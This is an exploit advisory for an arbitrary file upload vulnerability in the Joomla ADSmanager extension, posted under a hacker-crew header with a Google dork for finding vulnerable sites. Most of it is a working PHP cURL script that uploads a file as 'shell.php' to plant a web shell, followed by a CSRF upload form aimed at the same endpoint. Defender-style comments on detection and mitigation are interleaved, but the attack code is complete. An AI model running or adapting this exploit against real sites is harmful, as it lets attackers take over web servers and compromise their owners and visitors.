Assalamuallaikum Wr.Wb
# MrXerovhincs - Extreme Crew
# Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
# Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
# Date: 06/07/2015 : time : 04:42 Morning
# Exploit Author: Back-DOOR
# Vendor Homepage: www.joomprod.com
# Contact me On My page : fb.com/BaCkDoOr.HaCkInG
# contact me on my account : fb.com/Backdoor.ma
# Software Link: http://extensions.joomla.org/extension/adsmanager
# Tested on: Kali linux
# Vulnerable File : /index.php?option=com_adsmanager&task=upload&tmpl=component
# Exploit :
<?php
// Proof-of-concept client for the com_adsmanager upload task named in the advisory header.
// What it demonstrates: a single multipart POST in which the client, not the server, chooses
// the stored filename. The "name" field asks for a .php filename while the uploaded content
// is presented as a .jpg image, so the flaw is the upload handler trusting a request
// parameter for the final filename/extension.
//
// Detection (web-server / WAF logs):
//   - POST requests to index.php with option=com_adsmanager&task=upload&tmpl=component
//   - a "name" form field ending in a server-executable extension
//   - newly created script files in the directory where the component stores uploads
// Mitigation: update the component to a vendor-fixed release, derive the stored filename and
// extension server-side from an allow-list, and disable script execution in upload directories.
$url = "blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // placeholder host, not a real target
$post = array
(
// "@" prefix: legacy PHP cURL notation marking a local file to send as the upload body.
"file" => "@shell.jpg",
// Client-supplied destination filename; the extension differs from the uploaded file's.
"name" => "shell.php"
);
$ch = curl_init ("$url");
// Return the response body from curl_exec() instead of printing it directly.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
// Static browser-like User-Agent; the exact string is a usable log indicator for this script.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
// TLS certificate and hostname verification are both switched off for this request.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
// Passing an array makes cURL encode the body as multipart/form-data; "@" silences any PHP warning here.
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
// Print whatever the server answered (the upload handler's response).
echo $data;
?>
# CSRF :
<!-- Defender note: this is a plain cross-site multipart form posting to the same upload task.
     It carries no anti-CSRF token and no session-bound field, which suggests the handler does
     not require one (as claimed by this advisory; not otherwise shown on this page).
     NOTE(review): the field name here is "files[]", while the PHP script above posts "file"
     and "name"; which names the component actually reads is not shown here - confirm against
     the component source.
     Mitigation: require an authenticated, authorised session and a per-session token on the
     upload task, and validate the stored file type server-side. -->
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Reference : http://www.exploit4arab.net